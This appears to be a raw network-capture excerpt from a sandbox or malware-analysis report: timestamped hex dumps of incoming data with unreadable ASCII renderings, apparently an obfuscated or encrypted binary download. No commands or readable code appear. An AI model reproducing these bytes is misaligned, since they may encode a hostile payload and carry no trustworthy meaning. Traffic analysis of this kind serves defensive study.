                                2022-06-26 07:42:48 UTC101INData Raw: da da 66 20 21 64 20 09 eb 20 0d e6 64 50 11 eb 20 15 e6 64 58 19 eb 20 1d 25 68 20 09 75 8f 27 68 30 05 7c 0d aa 1c 25 0d f2 cd da da 66 28 05 d7 dc 7c fd 52 65 25 0d 11 21 da da 66 fd 0e e5 7f 34 34 89 64 35 8d 06 92 65 25 68 20 05 0d e8 64 da da 68 20 21 0d e0 64 da da 9e c4 36 a7 da da c6 0d 66 9e 3a 83 36 66 c0 38 9e 64 f1 64 39 49 66 48 25 c4 56 a7 da da 9e 66 e5 30 66 11 0d 61 da da da 68 28 2d 5e 9c 29 66 30 2d 0d ff da da da 38 e7 29 25 66 e5 66 e8 e1 f3 1c 25 d7 dc 7c 5d 9d 65 25 0d 23 21 da da 0d 20 a7 da da 9e 66 25 18 b7 25 25 e5 5a 51 99 34 18 b3 25 25 e5 5a f0 99 2e 08 e0 25 25 e5 99 30 08 62 25 25 25 99 61 6d 99 6d c6 30 e0 4c da da 1a 5e 0d 27 97 0e 99 12 c6 22 18 bb 25 25 e5 5a ec 99 10 08 6e 25 25 e5 99 4d 6d 99 ee 6d 99 3b c6 0a 08 d8
                                Data Ascii: f !d dP dX %h u'h0|%f(|Re%!f44d5e%h dh !d6f:6f8dd9IfH%Vf0fah(-^)f0-8)%ff%|]e%#! f%%%ZQ4%%Z.%%0b%%%amm0L^'"%%Zn%%Mmm;
                                2022-06-26 07:42:48 UTC103INData Raw: 94 a5 25 25 25 0d 48 ab da da 5c e9 b9 25 25 25 9e 66 e5 7b 32 66 1f 0e f7 60 e5 99 8b a5 61 5d 25 99 85 60 da 50 39 af 25 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e 71 d7 dc c6 6d 66 d2 73 c6 dc 73 60 1b a1 37 af 31 55 5c bc da 25 25 25 ea 7e e8 3d 9c 1c 25 97 c4 66 aa 06 f3 5c bc dc 25 25 a5 54 e0 24 5e a4 23 1c 60 a4 50 29 d7 27 c6 ee af 29 5d 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e 27 d7 dc 66 e7 3a 83 9e 68 65 25 2e 7b 66 17 66 fd 0e e5 a5 18 79 c2 1c 25 25 99 ea 66 9e 0d 49 ad da da 66 fb 6f 0d 8d da da da 83 36 9e b5 0e a4 a5 18 79 c2 1c 25 25 99 e2 0d 79 da da da 66 ed 66 9c 9e 68 65 25 2e 7b 66 17 66 fd 66 9e 0d ce 60 da da 16 15 a3 e4 66 9e 0d 0d 60 da da 66 15 66 fb 66 9e 0d e0 25 25 25 83 36 9e 66 e5 2e 7b 32 30 66 1f 66 15 0e c8 60 da a3 6b 66 eb
                                Data Ascii: %%%H\%%%f{2f`a]%`P9%%%%~=%Nqmfss`71U\%%%~=%f\%%T$^#`P)')]%%%~=%N'f:he%.{ffy%%fIfo6y%%yffhe%.{fff`f`fff%%%6f.{20ff`kf
                                2022-06-26 07:42:48 UTC104INData Raw: 7c 6d c2 1c 25 0d 99 da da da 75 0d 9b c7 da da 0e 1b c6 04 af 69 12 2b af 81 12 e2 4f fd 97 3f 1e ad 20 da af 20 da 00 da 25 25 25 ea 86 e0 3d 9c 1c 25 23 20 da 23 a6 50 0f 5e eb 27 5e 23 31 58 2f af 69 12 2b 2f 69 12 e2 50 ed 3a 83 36 34 38 9e 7c 71 c2 1c 25 5e 1d fa 52 e2 ea 7e e0 35 9e 1c 25 ea b7 e5 9e 68 65 25 30 66 11 5c e9 89 23 da da 2e 7b 32 a2 e0 6d c2 1c 25 e4 29 25 25 a2 e0 71 c2 1c 25 e4 25 25 25 a2 e0 75 c2 1c 25 dc 25 25 25 0d 48 c7 da da 60 e5 99 e0 7e 6d c2 1c 25 8b 60 e5 99 f6 66 f5 8b 5c 07 da de ea 92 f7 64 f0 71 c2 1c 25 ea 92 e5 9c 0d 2f 7e 75 c2 1c 25 e3 61 9e 65 25 9a 3d 9c 1c 25 94 2d 25 25 25 ce 80 5e 18 f5 e5 1c 25 27 ea 60 88 25 25 25 0d 48 da da da a9 e5 99 ee eb e0 30 c2 1c 25 25 eb e0 79 c2 1c 25 25 c4 9a 25 25 25 30 0d 15
                                Data Ascii: |m%ui+O? %%%=%# #P^'^#1X/i+/iP:648|q%^R~5%he%0f\#.{2m%)%%q%%%%u%%%%H`~m%`f\dq%/~u%ae%=%-%%%^%'`%%%H0%%y%%%%%0
                                2022-06-26 07:42:48 UTC105INData Raw: 25 da 00 59 ce 1c 25 66 e5 30 66 11 5e e9 11 2e 0e e5 64 20 11 0e e5 30 8d 91 a2 65 25 89 da 55 89 64 45 0d 20 78 da da 66 fd 60 b6 99 12 64 38 15 eb 20 19 25 68 30 11 66 9e 0d af 09 da da 66 20 11 64 20 1d eb 20 21 e6 68 20 15 75 8f dc 66 e8 cd aa 1c 25 d7 dc 7c 15 9d 65 25 0d 9d c8 da da 66 f5 c6 39 66 e8 45 f5 1c 25 d7 dc 7c 15 9d 65 25 0d 4b c8 da da 66 f5 64 7f 31 66 e7 0d 8b 97 da da 0e e5 7f 34 34 89 64 35 8d 4e a2 65 25 68 20 11 0d 98 9d da da 9e c4 ee 97 da da c6 15 36 66 c0 38 9e 2e 66 fd 60 b6 50 e0 0d 7d da da da 66 9e 36 9e 2e 7b 2c 96 39 9e 1c 25 66 19 c6 3b 66 de 64 2b 66 2b 66 25 64 de df 2d 25 25 25 66 2b 0d 5f 87 da da 5e 16 25 50 c0 7f 83 36 9e b5 2e 8d 11 a2 65 25 0d 7c c1 da da 66 fd 60 b6 99 35 8d 21 a2 65 25 2e 0d bd c1 da da 7e 61
                                Data Ascii: %Y%f0f^.d 0e%UdE xf`d8 %h0ff d !h uf%|e%f9fE%|e%Kfd1f44d5Ne%h 6f8.f`P}f6.{,9%f;fd+f+f%d-%%%f+_^%P6.e%|f`5!e%.~a
                                2022-06-26 07:42:48 UTC107INData Raw: da da 66 29 49 da 6d 31 66 29 49 5e 9d 31 25 50 6d 66 f9 66 1e 45 0d e4 d8 da da 0d e9 72 da da 16 1e 49 99 59 68 1e 31 0d 92 d6 da da 66 ed 5c d4 da da 25 25 50 e4 66 9e 0d 43 23 da da c6 f4 60 a4 5a f0 66 9c 94 da da 25 25 74 d2 d4 60 f7 50 e2 66 9e 0d de 23 da da 7f 36 9e 66 35 0e a4 64 2d 66 e7 0d e2 8d da da 9e 66 e5 30 66 11 5e e9 19 2e 66 fd 77 0d 2c bd da da 64 20 19 0e e5 30 8d 2f a8 65 25 89 da 55 89 64 45 b4 58 23 0e e5 30 8d 11 f1 65 25 89 da 55 89 64 45 66 9e 0d 3d 9d da da 75 0d ef 72 da da 64 20 1d 0e e5 7f 34 34 89 64 35 8d ce f1 65 25 b6 07 b4 48 23 9e c4 6e 91 da da c6 ce 0e e5 7f 34 34 89 64 35 8d ec a8 65 25 66 20 19 75 0d ca 72 da da 9e c4 50 91 da da c6 ca 66 20 1d 36 66 c0 38 9e 68 65 25 f8 25 25 25 31 9e 1c 25 b1 aa 1c 25 29 9e 1c
                                Data Ascii: f)Im1f)I^1%PmffErIYh1f\%%PfC#`Zf%%t`Pf#6f5d-ff0f^.fw,d 0/e%UdEX#0e%UdEf=urd 44d5e%H#n44d5e%f urPf 6f8he%%%%1%%)
                                2022-06-26 07:42:48 UTC108INData Raw: 65 dd 41 a8 65 25 0d 45 91 da da dd 2d f3 65 25 0d 63 91 da da a5 18 40 0b 1c 25 25 99 ea dd 5d 9c 1c 25 df 0d ac 65 25 0d ef 93 da da 0d e4 c4 da da 0d 2d 0f da da 0d ce d0 da da 0d bb cc da da 0e e5 7f 34 34 89 64 35 8d b6 ac 65 25 9e c4 86 42 da da c6 1d 38 9e 25 25 25 da da da da 27 25 25 25 55 9d 25 25 2e 7b 66 17 66 fd 16 ce 58 33 66 9e 06 eb 0d b4 81 da da de eb 83 36 9e 66 eb 06 9e 0d a6 81 da da de 9e 83 36 9e 66 e5 30 66 11 0e e5 30 8d 14 f7 65 25 89 da 55 89 64 45 da e0 cd c2 1c 25 0e e5 7f 34 34 89 64 35 8d 65 f7 65 25 9e c4 6b 42 da da c6 1d 38 9e 66 e5 5e 08 cd c2 1c 25 dc 9e 30 66 11 0e e5 30 8d 4c f7 65 25 89 da 55 89 64 45 da e0 d1 c2 1c 25 0e e5 7f 34 34 89 64 35 8d 9d f7 65 25 9e c4 33 42 da da c6 1d 38 9e 66 e5 5e 08 d1 c2 1c 25 dc 9e
                                Data Ascii: eAe%E-e%c@%%]%e%-44d5e%B8%%%'%%%U%%.{ffX3f6f6f0f0e%UdE%44d5ee%kB8f^%0f0Le%UdE%44d5e%3B8f^%
                                2022-06-26 07:42:48 UTC110INData Raw: 15 66 9e 36 34 38 e7 35 25 b5 da 00 6d ce 1c 25 66 e5 da 00 69 ce 1c 25 66 e5 da 00 65 ce 1c 25 66 e5 da 00 61 ce 1c 25 66 e5 30 66 11 2c 2e 7b 66 ff 66 15 64 38 21 66 20 2d 5e 9d 21 25 99 f4 7b 66 20 2d 66 65 21 75 0d 18 68 da da 64 20 21 5e 58 21 25 50 de 64 38 21 66 20 21 83 36 34 38 9e b5 30 66 11 2c 8d 5d b4 65 25 0d 37 68 da da 64 20 21 30 df c9 f7 65 25 dd 6d b4 65 25 0d 82 da da da 34 7e d5 c2 1c 25 30 df f9 f7 65 25 dd 81 b4 65 25 0d 6c da da da 34 7e d9 c2 1c 25 30 df f9 f7 65 25 dd 89 b4 65 25 0d 56 da da da 34 7e dd c2 1c 25 30 df 05 f7 65 25 dd 91 b4 65 25 0d 40 da da da 34 7e e1 c2 1c 25 30 df 05 f7 65 25 dd 99 b4 65 25 0d 2a da da da 34 7e e5 c2 1c 25 30 df 05 f7 65 25 dd a1 b4 65 25 0d 14 da da da 34 7e e9 c2 1c 25 30 df 05 f7 65 25 dd a9
                                Data Ascii: f6485%m%fi%fe%fa%f0f,.{ffd8!f -^!%{f -fe!uhd !^X!%Pd8!f !6480f,]e%7hd !0e%me%4~%0e%e%l4~%0e%e%V4~%0e%e%@4~%0e%e%*4~%0e%e%4~%0e%
                                2022-06-26 07:42:48 UTC111INData Raw: 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f0 20 7b 3c 97 44 3c 93 99 79 54 95 40 1e 3c 4e 99 20 97 97 4a 97 66 e5 e1 01 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 e1 01 65 25 31 25 25 25 a1 52 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f0 20 7b 3c 97 44 3c 93 99 2a 9b 40 97 8b 91 4a 52 20 97 97 4a 97 66 e5 45 b8 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 45 b8 65 25 31 25 25 25 a1 52 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f2 20 7b 3c 97 44 3c 93 99 24 93 9b 3c 91 44 89 1c 97 42 20 97 97
                                Data Ascii: %[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<yT@<N Jfe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%e%1%%%Re%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<*@JR JfEe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Ee%1%%%Re%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<$<DB
                                2022-06-26 07:42:48 UTC115INData Raw: 25 68 20 21 0d c2 34 da da 9e c4 94 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d 37 c8 65 25 89 da 55 89 64 45 68 20 21 0d d3 53 25 25 66 9e 66 30 21 0d e9 63 25 25 0e e5 7f 34 34 89 64 35 8d f4 c8 65 25 68 20 21 0d f2 2e da da 9e c4 48 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d 83 c8 65 25 89 da 55 89 64 45 68 20 21 0d 3f 61 25 25 66 9e 66 30 21 0d 2d 1a 25 25 0e e5 7f 34 34 89 64 35 8d 40 c8 65 25 68 20 21 0d f6 48 da da 9e c4 fc 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d cf c8 65 25 89 da 55 89 64 45 68 20 21 0d 27 16 25 25 66 9e 66 30 21 0d b5 63 25 25 0e e5 7f 34 34 89 64 35 8d 8c c8 65 25 68 20 21 0d aa 91 da da 9e c4 b0 26 da da c6 15 36 34 38 9e 68 65 25 2e 7b 32
                                Data Ascii: %h !4q648he%0f%.f07e%UdEh !S%%ff0!c%%44d5e%h !.Hq648he%0f%.f0e%UdEh !?a%%ff0!-%%44d5@e%h !Hq648he%0f%.f0e%UdEh !'%%ff0!c%%44d5e%h !&648he%.{2
                                2022-06-26 07:42:48 UTC119INData Raw: da 57 89 64 47 66 20 21 8b 66 25 ea 92 f5 5e 1f 39 ea 62 a6 dc 25 25 da 49 70 3a d8 65 25 8e d8 65 25 eb d8 65 25 ca d8 65 25 27 23 65 25 39 23 65 25 4f 23 65 25 65 23 65 25 81 23 65 25 97 23 65 25 35 da 65 25 fe da 65 25 60 23 65 25 1f 23 65 25 35 da 65 25 fe da 65 25 fe da 65 25 bd 23 65 25 86 23 65 25 9a 23 65 25 ae 23 65 25 0b 23 65 25 a2 20 15 25 25 25 25 a2 20 19 25 25 25 25 c4 8d de 25 25 a5 18 45 9e 1c 25 25 99 e8 8b df 39 25 8b dd dc 25 0d 01 07 da da a2 20 15 25 25 25 25 a2 20 19 25 25 25 25 c4 1a de 25 25 66 20 21 ea 9a 65 2d 74 64 20 15 64 30 19 c4 51 de 25 25 66 20 21 66 65 2d 74 64 20 15 64 30 19 c4 3f de 25 25 66 20 21 b4 65 2d 0d a0 0a da da 64 20 15 64 30 19 c4 29 de 25 25 66 20 21 b8 65 2d 0d 8a 0a da da 64 20 15 64 30 19 c4 13 27 25 25
                                Data Ascii: WdGf !f%^9b%%Ip:e%e%e%e%'#e%9#e%O#e%e#e%#e%#e%5e%e%`#e%#e%5e%e%e%#e%#e%#e%#e%#e% %%%% %%%%%%E%%9%% %%%% %%%%%%f !e-td d0Q%%f !fe-td d0?%%f !e-d d0)%%f !e-d d0'%%
                                2022-06-26 07:42:48 UTC123INData Raw: 1c 25 c8 31 1c 25 c8 31 1c 25 c8 31 1c 25 b3 31 1c 25 c9 31 1c 25 92 31 1c 25 ef 31 1c 25 bc 31 1c 25 0e e5 64 20 1d c4 de dc 25 25 a5 18 45 9e 1c 25 25 99 e8 8b df 29 25 8b dd dc 25 0d 9b f9 da da 0e e5 64 20 1d c4 be 25 25 25 66 20 21 ba 65 2d b4 38 1d 76 c4 f9 25 25 25 66 20 21 b6 65 2d b4 38 1d 76 c4 a0 25 25 25 66 20 21 66 65 2d 64 20 1d c4 92 25 25 25 66 20 21 ea 9a 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c4 7c 25 25 25 66 20 21 ea e3 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c4 66 25 25 25 66 20 21 ea db 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c6 9d 66 20 21 ea 92 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c6 40 66 20 21 66 65 2d 64 20 11 0e e5 64 20 15 ba 48 11 b4 38 1d 76 c6 73 66 20 21 ba 8d 2d b4 38 1d 76 c6 67 0e e5 30 8d ec e8 1c 25 89 da 55 89 64 45 66 20 21 0d
                                Data Ascii: %1%1%1%1%1%1%1%1%d %%E%%)%%d %%%f !e-8v%%%f !e-8v%%%f !fe-d %%%f !e-d 8v|%%%f !e-d 8vf%%%f !e-d 8vf !e-d 8v@f !fe-d d H8vsf !-8vg0%UdEf !
                                2022-06-26 07:42:48 UTC127INData Raw: 3c da da 66 30 1d 66 eb 0d 0f fe da da c4 c2 de 25 25 b4 1e 2d 5e e9 19 b6 61 49 76 68 20 19 0d 16 50 da da 66 30 19 66 eb 0d a4 fe da da c4 eb de 25 25 b8 1e 2d 5e e9 19 b6 61 49 76 68 20 15 0d 3f 50 da da 66 30 15 66 eb 0d cd fe da da c4 80 de 25 25 da 4e 31 da 4e 2d 68 20 11 0d ac d6 da da 66 30 11 66 eb 0d 9a 00 da da c4 ad de 25 25 da 4e 31 da 4e 2d 68 20 0d 0d 11 d6 da da 66 30 0d 66 eb 0d c7 00 da da c4 46 de 25 25 68 20 09 75 66 1e 2d 94 da da da 5a df dc 25 25 25 0d 5a 06 da da 66 30 09 66 eb 0d 58 00 da da c4 6b de 25 25 68 30 05 8b 66 1e 2d 0d 09 d6 da da 66 30 05 66 eb 0d 87 00 da da c4 06 de 25 25 68 30 01 ea e3 1e 2d 0d 64 85 da da 66 30 01 66 eb 0d ee fe da da c4 35 de 25 25 68 30 fd 0e e5 af 1e 2d 0d 48 85 da da 66 30 fd 66 eb 0d d2 47 da
                                Data Ascii: <f0f%%-^aIvh Pf0f%%-^aIvh ?Pf0f%%N1N-h f0f%%N1N-h f0fF%%h uf-Z%%%Zf0fXk%%h0f-f0f%%h0-df0f5%%h0-Hf0fG
                                2022-06-26 07:42:48 UTC131INData Raw: 25 25 1e 50 97 97 40 93 3e 54 25 25 25 25 da da da da 29 25 25 25 69 3c 99 40 25 25 25 25 da da da da 2b 25 25 25 2a 91 40 2e 99 97 25 25 da da da da 2d 25 25 25 69 44 4e 95 3c 99 3e 8d 25 25 25 25 da da da da e0 25 25 25 20 97 97 4a 97 25 25 25 da da da da e2 25 25 25 67 4a 4a 91 40 3c 93 25 da da da da e2 25 25 25 7b 3c 97 44 3c 93 99 25 da da da da e2 25 25 25 30 93 46 93 4a 52 93 25 da da da da e2 25 25 25 69 40 3e 44 48 3c 91 25 da da da da de 25 25 25 49 55 6b 25 da da da da 2d 25 25 25 2e 8d 4a 97 99 24 93 99 25 25 25 25 da da da da 29 25 25 25 67 54 99 40 25 25 25 25 da da da da 29 25 25 25 32 4a 97 89 25 25 25 25 da da da da 2d 25 25 25 71 4a 93 42 32 4a 97 89 25 25 25 25 da da da da e0 25 25 25 24 93 99 5b 59 25 25 25 30 66 11 5c e9 1d d8 da da
                                Data Ascii: %%P@>T%%%%)%%%i<@%%%%+%%%*@.%%-%%%iDN<>%%%%%%% J%%%%%%gJJ@<%%%%{<D<%%%%0FJR%%%%i@>DH<%%%%IUk%-%%%.J$%%%%)%%%gT@%%%%)%%%2J%%%%-%%%qJB2J%%%%%%%$[Y%%%0f\
                                2022-06-26 07:42:48 UTC135INData Raw: 99 2d 68 30 d1 0d fe de 25 25 66 38 15 60 b6 99 41 26 68 d9 b8 d1 d8 da da 66 a3 29 60 da 99 e4 66 b2 66 2b 0d 0d 35 da da 60 b6 50 09 0e e5 7f 34 34 89 64 35 8d 0f 18 1c 25 66 38 15 60 b6 99 37 26 66 a9 b8 d1 d8 da da 75 0d fb 1b da da 60 b6 50 13 9e c4 c1 d6 23 da c6 ba 0e e5 7f 34 34 89 64 35 8d e8 63 1c 25 68 20 d1 66 f0 95 59 1c 25 0d f6 31 da da 9e c4 54 d6 23 da c6 0f 3a 83 36 66 c0 38 e7 2d 25 66 e5 30 66 11 5e e9 1d 66 20 2d 66 65 21 64 20 1d eb 20 21 2b 68 20 1d 75 8f 25 66 e8 e5 aa 1c 25 d7 dc 7c 85 10 1c 25 0d 44 9b da da 0d 99 d6 23 da 34 34 38 9e 30 66 11 5e e9 05 2e 7b 32 64 28 19 64 30 21 64 20 09 68 58 05 66 20 21 64 e2 0e 1b 64 40 1d 66 20 19 65 9c 05 27 04 e9 68 20 15 64 45 66 e2 0d ad 6b da da 66 fd 8f 25 8f 25 2e 66 e2 75 8f 25 8f 25
                                Data Ascii: -h0%%f8`A&hf)`ff+5`P44d5%f8`7&fu`P#44d5c%h fY%1T#:6f8-%f0f^f -fe!d !+h u%f%|%D#4480f^.{2d(d0!d hXf !dd@f e'h dEfkf%%.fu%%
                                2022-06-26 07:42:48 UTC139INData Raw: 50 95 4e b5 30 66 11 2c 2e 7b 32 a9 f7 99 2d 5e e9 15 0d a0 0d 23 da 66 d4 ad 30 da 66 fd 0e f7 66 9e 0d 0c 0b 23 da d7 dc 7c 59 6d 1c 25 0d 00 0b 23 da 64 1e 29 d7 dc 7c 19 6f 1c 25 0d 3b 0b 23 da 64 1e 2d d7 dc 7c 59 6d 1c 25 0d e2 0b 23 da 66 15 64 4e 31 66 eb 66 b2 0d a4 27 25 25 66 9e a5 58 da 25 99 ea 0d ed 0d 23 da 89 6a e0 25 25 25 25 5e e9 31 66 9e 3a 83 36 34 38 9e 66 e5 2e 7b 0d 98 0d 23 da 66 ff 66 15 66 ae a5 07 21 66 eb 0d bc c0 23 da 66 6b 29 0d c4 c0 23 da 66 6b 2d 0d bc c0 23 da 66 6b 31 0d b4 c0 23 da a9 b6 a3 e2 66 eb 0d 97 0d 23 da 83 36 9e 68 65 25 2e 7b 66 ff 66 15 60 b6 99 35 66 eb 0d 86 29 da da 16 fd 99 e0 0e e5 83 36 9e d5 dc 83 36 9e b5 2e 7b 32 66 1f 66 15 66 6b 31 66 7d 2d 26 5e d6 25 a1 00 66 ae 66 6b 31 0d 46 de 25 25 66 b2
                                Data Ascii: PN0f,.{2-^#f0ff#|Ym%#d)|o%;#d-|Ym%#fdN1ff'%%fX%#j%%%%^1f:648f.{#fff!f#fk)#fk-#fk1#f#6he%.{ff`5f)66.{2fffk1f}-&^%ffk1F%%f
                                2022-06-26 07:42:48 UTC143INData Raw: 35 8d 8a 83 1c 25 66 20 21 0d d0 b0 23 da 9e c4 b2 ff 23 da c6 15 83 34 38 9e b5 30 66 11 5e e9 1d 2e 7b 0e a4 64 28 1d 66 ff 64 20 21 0e e5 30 8d 2c 3a 1c 25 89 da 55 89 64 45 66 20 21 0d 61 d4 da da 0e e5 30 8d 59 3a 1c 25 89 da 55 89 64 45 66 9e 66 35 da 37 66 15 66 9e 0d 2a e6 25 25 06 15 68 20 1d 66 f3 0e f7 0d ec 07 23 da 66 30 1d 66 f3 66 9e 66 3d da 2e 31 66 30 1d 66 20 21 66 2d da 2c 51 0e e5 7f 34 34 89 64 35 8d 16 3a 1c 25 66 20 21 0d 7c d4 da da 9e c4 26 ff 23 da c6 15 0e e5 7f 34 34 89 64 35 8d 7d 3a 1c 25 68 20 1d 0d fd 05 23 da 9e c4 53 ff 23 da c6 15 83 36 34 34 38 9e 66 e5 30 66 11 5e e9 1d 2e 7b 32 0e b6 64 38 1d 66 cc 66 ff 64 20 21 0e e5 30 8d dc 85 1c 25 89 da 55 89 64 45 16 ce 99 89 66 20 21 0d 64 1d da da 0e e5 30 8d 09 3a 1c 25 89
                                Data Ascii: 5%f !##480f^.{d(fd !0,:%UdEf !a0Y:%UdEff57ff*%%h f#f0fff=.1f0f !f-,Q44d5:%f !|&#44d5}:%h #S#6448f0f^.{2d8ffd !0%UdEf !d0:%
                                2022-06-26 07:42:48 UTC148INData Raw: 30 1d 64 20 21 5e 18 b1 0d 1c 25 25 ea a9 ab 25 25 25 7c b1 0d 1c 25 0d 4b c0 da da 66 1d 0e e5 30 8d 8a 4a 1c 25 89 da 55 89 64 45 66 3a 2d 26 5e d6 25 a1 69 66 ae 66 a2 0d 45 be da da 66 15 5e 58 21 25 99 2d 66 6b 2d 16 20 21 50 00 5e 58 1d 25 99 ea 66 7b 35 66 20 1d 0d fe e8 da da a9 e5 99 35 66 ae 66 a2 0d 23 bc da da 66 eb 0d e6 a0 23 da 26 5e d6 da 50 e1 0e e5 7f 34 34 89 64 35 8d db 4a 1c 25 7c b1 0d 1c 25 0d eb 09 da da 9e c4 f5 a4 23 da c6 13 3a 83 36 34 34 38 9e 68 65 25 30 66 11 2c 2e 7b 32 64 20 21 5e 18 b1 0d 1c 25 25 99 46 7c b1 0d 1c 25 0d 5e 09 da da 66 1d 0e e5 30 8d 12 95 1c 25 89 da 55 89 64 45 66 3a 2d 26 5e d6 25 a1 04 66 ae 66 a2 0d 58 07 da da 66 15 66 6b 29 16 20 21 50 35 66 ae 66 a2 0d 9b bc da da 66 eb 0d 5e e9 23 da 26 5e d6 da
                                Data Ascii: 0d !^%%%%%|%Kf0J%UdEf:-&^%iffEf^X!%-fk- !P^X%f{5f 5ff#f#&^P44d5J%|%#:6448he%0f,.{2d !^%%F|%^f0%UdEf:-&^%ffXffk) !P5fff^#&^
                                2022-06-26 07:42:48 UTC152INData Raw: c6 c6 66 20 21 83 36 66 c0 38 9e 66 e5 2e 7b 32 5e e9 1d 66 cc 66 1f 66 fd 8f 65 8d 25 55 25 25 7b 8f 25 2e 0d 79 c0 23 da 64 29 49 68 69 49 29 75 7b 32 66 69 49 31 75 2e 0d 5a c0 23 da 66 29 49 34 7f 3a 83 36 9e 66 e5 30 66 11 5e e9 15 2e 7b 32 66 d4 66 17 66 fd 66 28 31 66 b2 66 9e 0d 84 da da da 64 20 1d 66 eb 0d b2 23 da da 66 ed 66 fb 66 9e 0d b9 da da da 64 20 21 68 20 15 75 8f 25 66 20 1d 75 66 20 21 75 8f 25 8f 25 2e 0d 2c be 23 da 66 15 a5 58 2d 25 99 f6 8f da 7b 0d dc c0 23 da 68 20 19 75 66 20 31 75 32 66 20 1d 75 2e 0d a3 09 23 da 66 eb 3a 83 36 66 c0 38 e7 2d 25 68 65 25 2e 7b 32 30 5c e9 f5 23 da da 66 0f 66 1d 0e b6 8f 65 8d 25 35 25 25 8d fe dc 25 25 8f 25 32 0d b9 09 23 da 64 29 49 5e 61 49 25 ea a9 84 25 25 25 66 29 49 eb 69 49 31 8d 68
                                Data Ascii: f !6f8f.{2^fffe%U%%{%.y#d)IhiI)u{2fiI1u.Z#f)I4:6f0f^.{2ffff(1ffd f#fffd !h u%f uf !u%%.,#fX-%{#h uf 1u2f u.#f:6f8-%he%.{20\#ffe%5%%%%%2#d)I^aI%%%%f)IiI1h
                                2022-06-26 07:42:48 UTC155INData Raw: e9 19 2e 7b 32 0e b6 64 38 19 66 d4 64 30 1d 64 20 21 66 20 21 0d e3 dd 23 da 66 20 1d 0d db dd 23 da 0e e5 30 8d a8 b1 1c 25 89 da 55 89 64 45 0e 1b 68 20 19 66 30 21 0d 5e d9 23 da 66 20 19 0d 7e db 23 da 75 66 a2 94 dc 25 25 25 66 f0 d5 ad 1c 25 0d e1 eb 23 da 5e e9 29 66 30 19 66 20 1d 0d 8f 94 23 da 66 fd 26 5e d6 da 50 ea 66 e2 68 29 d5 66 30 19 0d dc d9 23 da c6 10 66 e2 68 29 d5 75 66 a6 df dc 25 25 25 66 20 19 0d db dd 23 da 66 20 1d 0d 73 db 23 da 66 ed de a6 68 20 19 df dc 25 25 25 0d b8 dd 23 da 6b 5e 58 19 25 50 84 0e e5 7f 34 34 89 64 35 8d f9 b1 1c 25 68 20 19 df de 25 25 25 0d a5 8e 23 da 9e c4 d7 d1 23 da c6 c6 3a 83 36 66 c0 38 9e b5 2e 7b 32 30 2c 66 c4 66 ff 64 29 49 68 4e dc 66 fb 66 a0 0d 49 94 23 da 73 60 1b a1 f6 6b 0e da 66 41 49
                                Data Ascii: .{2d8fd0d !f !#f #0%UdEh f0!^#f ~#uf%%%f%#^)f0f #f&^Pfh)f0#fh)uf%%%f #f s#fh %%%#k^X%P44d5%h %%%##:6f8.{20,ffd)IhNffI#s`kfAI
                                2022-06-26 07:42:48 UTC159INData Raw: 25 df f1 d7 1c 25 0d 11 7e 23 da da 10 59 c4 1c 25 da 10 41 c4 1c 25 da 10 25 c4 1c 25 8d 05 d7 1c 25 68 60 99 da da da df 29 25 25 25 0d cc cb 23 da 66 60 99 da da da 0d 4b cd 23 da 75 0d 05 a2 23 da 7e ed 0d 1c 25 da 10 71 c4 1c 25 8d 11 d7 1c 25 da 10 5d c4 1c 25 8d 21 d7 1c 25 da 10 f5 0d 1c 25 68 60 95 da da da df e0 25 25 25 0d 8a cb 23 da 66 60 95 da da da 0d 09 82 23 da 75 7c ed 0d 1c 25 75 0d 7d a2 23 da 7e dd 0d 1c 25 df 6d 3e 65 25 dd dd 0d 1c 25 0d f9 11 da da 7c ed 0d 1c 25 75 0d 9c eb 23 da dd 59 c4 1c 25 df 31 8e 1c 25 0d 63 7e 23 da dd 41 c4 1c 25 df 3d 8e 1c 25 0d 0a 7e 23 da dd 25 c4 1c 25 df 49 8e 1c 25 0d 45 7e 23 da dd 5d c4 1c 25 df 55 8e 1c 25 0d ec 7e 23 da dd 71 c4 1c 25 df 65 8e 1c 25 0d 27 7e 23 da dd f5 0d 1c 25 df 71 8e 1c 25
                                Data Ascii: %%~#Y%A%%%%h`)%%%#f`K#u#~%q%%]%!%%h`%%%#f`#u|%u}#~%m>e%%|%u#Y%1%c~#A%=%~#%%I%E~#]%U%~#q%e%'~#%q%
